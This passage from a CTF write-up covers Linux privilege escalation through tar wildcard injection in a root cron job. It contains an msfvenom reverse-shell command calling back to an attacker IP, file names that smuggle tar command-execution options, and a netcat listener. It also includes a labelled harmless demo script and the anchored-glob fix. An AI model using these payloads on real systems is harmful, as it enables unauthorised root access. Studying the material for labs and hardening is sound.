<code>netcat<\/code> listener.<\/p>\n<p>First, generate a reverse-shell payload with msfvenom:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">msfvenom -p linux\/x64\/shell_reverse_tcp LHOST=10.6.2.23 LPORT=8888 -f elf -o shell.elf<\/pre>\n<p>Next, transfer <code>shell.elf<\/code> to <code>\/home\/user<\/code> on the target (for example via a <a href=\"https:\/\/blog.finxter.com\/python-one-liner-webserver\/\" data-type=\"post\" data-id=\"8635\" target=\"_blank\" rel=\"noreferrer noopener\">simple HTTP server<\/a>) and make it executable with <code>chmod +x<\/code>. Then create two empty files whose names will be parsed as <code>tar<\/code> options: the first makes <code>tar<\/code> check after every record, the second runs <code>shell.elf<\/code> through <code>\/bin\/sh<\/code> at each checkpoint. The bare name resolves because <code>\/home\/user<\/code> is on the crontab\u2019s <code>PATH<\/code>, as in Task 9.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">touch \/home\/user\/--checkpoint=1\ntouch \/home\/user\/--checkpoint-action=exec=shell.elf\n<\/pre>\n<p>Finally, start a <code>netcat<\/code> listener and wait for the job to fire; the shell that connects back is root\u2019s.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nc -lnvp 8888<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"765\" height=\"173\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-227.png\" alt=\"\" class=\"wp-image-1138649\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-227.png 765w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-227-300x68.png 300w\" sizes=\"auto, (max-width: 765px) 100vw, 765px\" \/><\/figure>\n<\/div>\n<div 
class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"393\" height=\"481\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-228.png\" alt=\"\" class=\"wp-image-1138650\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-228.png 393w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-228-245x300.png 245w\" sizes=\"auto, (max-width: 393px) 100vw, 393px\" \/><\/figure>\n<\/div>\n<h2>POST-EXPLOITATION<\/h2>\n<p>Clean up: remove the payload and the two option-named files, otherwise the backup job keeps executing the payload every minute. Using the full path, as below, avoids <code>rm<\/code> itself mistaking the <code>--checkpoint<\/code> names for options.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">rm \/home\/user\/shell.elf\nrm \/home\/user\/--checkpoint=1\nrm \/home\/user\/--checkpoint-action=exec=shell.elf\n<\/pre>\n<h2>FINAL THOUGHTS<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"527\" height=\"797\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-236.png\" alt=\"\" class=\"wp-image-1138665\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-236.png 527w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-236-198x300.png 198w\" sizes=\"auto, (max-width: 527px) 100vw, 527px\" \/><\/figure>\n<\/div>\n<p>Magic isn\u2019t actually needed to carry out any of the <code>privesc<\/code> methods outlined in this post. 
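<\/p>
<p>Task 10\u2019s wildcard injection can be reproduced on any Linux box with GNU tar, without cron or a reverse shell. The script below is an added example, not code from the post or the room: it plants the two option-named files next to a harmless payload, runs <code>tar<\/code> the way the backup job does, and reports whether the payload ran. The second mode shows the fix: anchoring the glob as <code>.\/*<\/code> turns the same names into ordinary paths such as <code>.\/--checkpoint=1<\/code>, which <code>tar<\/code> archives as files instead of parsing as options. All file names and contents are constructed for the demo.<\/p>

```shell
#!/bin/sh
# Added example, not code from the original post or the TryHackMe room.
# Reproduces Task 10's tar wildcard injection in a throwaway directory, with a
# harmless payload that only drops a marker file. Requires GNU tar.
#   wildcard_demo vuln   run tar over a bare * glob, as the room's backup job does
#   wildcard_demo safe   run tar over ./* so no file name can be read as an option
# Prints the archive's member list; returns 0 if tar executed the planted payload.
# All file names and contents below are constructed for the demo.
wildcard_demo() {
    _mode=$1
    _dir=$(mktemp -d)
    _archive=$(mktemp)
    _marker=$_dir/payload_ran
    printf 'just some data\n' > "$_dir/notes.txt"                       # a file the job really backs up
    printf '#!/bin/sh\ntouch "%s"\n' "$_marker" > "$_dir/payload.sh"     # stands in for shell.elf
    # Two empty files whose *names* are tar options. Once the shell expands the
    # glob, GNU tar permutes its arguments and honours them: checkpoint after
    # every record, and at each checkpoint run the given command via /bin/sh.
    : > "$_dir/--checkpoint=1"
    : > "$_dir/--checkpoint-action=exec=sh payload.sh"
    case $_mode in
        vuln) ( cd "$_dir" && tar cf "$_archive" * ) ;;
        safe) ( cd "$_dir" && tar cf "$_archive" ./* ) ;;
        *)    rm -rf "$_dir" "$_archive"; echo "usage: wildcard_demo vuln|safe" >&2; return 2 ;;
    esac
    tar tf "$_archive" | sed 's/^/  archived: /'
    _rc=1
    [ -e "$_marker" ] && _rc=0
    rm -rf "$_dir" "$_archive"
    return $_rc
}

echo "bare * glob (what the room's cron job does):"
if wildcard_demo vuln; then
    echo "  -> payload executed by tar"
else
    echo "  -> payload not executed (non-GNU tar?)"
fi
echo "anchored ./* glob (the fix):"
if wildcard_demo safe; then
    echo "  -> payload executed"
else
    echo "  -> payload not executed; the option-looking names were archived as plain files"
fi
```

<p>In the vulnerable run the member list contains only <code>notes.txt<\/code> and <code>payload.sh<\/code>, because <code>tar<\/code> consumed the other two names as options and ran the payload; in the anchored run all four names appear as members and nothing is executed. The same mistake appears wherever a privileged job hands an unanchored glob to a tool with command-running options (<code>rsync -e<\/code> is the classic second example); the fix is always the same: anchor or quote the glob, or end the option list with <code>--<\/code> before it.<\/p>
<p>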
<\/p>\n<p>As long as the target has one of the misconfigurations seen here (a service such as MySQL running as root, password files that are readable or writable, sudo rules that allow shell escapes or preserve <code>LD_PRELOAD<\/code> and <code>LD_LIBRARY_PATH<\/code>, or cron jobs whose scripts, <code>PATH<\/code> or wildcards a normal user controls), escalating to root is a matter of minutes. The same list doubles as a hardening checklist for a defender.<\/p>\n<p>Thanks for reading this write-up, and be sure to check out part II for more \u201cmagical\u201d privesc methods.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>CHALLENGE OVERVIEW CTF Creator: Tib3rius Link: https:\/\/tryhackme.com\/room\/linuxprivesc Difficulty: medium&nbsp; Target: gaining root access using a variety of different techniques Highlight: Quickly gaining root access on a Linux computer in many different ways Tags: privesc, linux, privilege escalation BACKGROUND Using different exploits to compromise operating systems can feel like magic (when they [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[857],"tags":[73,468,528],"class_list":["post-131891","post","type-post","status-publish","format-standard","hentry","category-python-tut","tag-programming","tag-python","tag-tutorial"],"_links":{"self":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/131891","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/comments?post=131891"}],"version-history":[{"count":0,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/131891\/revisions"}],"wp:attachment":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/medi
a?parent=131891"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/categories?post=131891"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/tags?post=131891"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}